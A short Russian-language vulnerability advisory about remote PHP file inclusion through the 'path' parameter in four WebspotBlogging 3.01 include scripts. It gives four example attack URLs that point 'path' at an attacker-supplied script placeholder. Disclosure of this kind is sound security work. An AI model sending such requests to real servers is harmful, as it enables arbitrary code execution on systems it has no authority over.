Программа: WebspotBlogging 3.01, возможно другие
версии.

Уязвимость позволяет удаленному
пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за
недостаточной обработки входных данных в
параметре "path" в сценариях /inc/logincheck.inc.php,
/inc/adminheader.inc.php, /inc/global.php и /inc/mainheader.inc.php.
Удаленный пользователь может с помощью
специально сформированного запроса
выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера.
Для удачной эксплуатации уязвимости опция
"register_globals" должна быть включена.

Пример:

http://victim/[Webspotblogging_path]/inc/logincheck.inc.php?path=[evil_scripts]
http://victim/[Webspotblogging_path]/inc/adminheader.inc.php?path=[evil_scripts]
http://victim/[Webspotblogging_path]/inc/global.php?path=[evil_scripts]
http://victim/[Webspotblogging_path]/inc/mainheader.inc.php?path=[evil_scripts]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии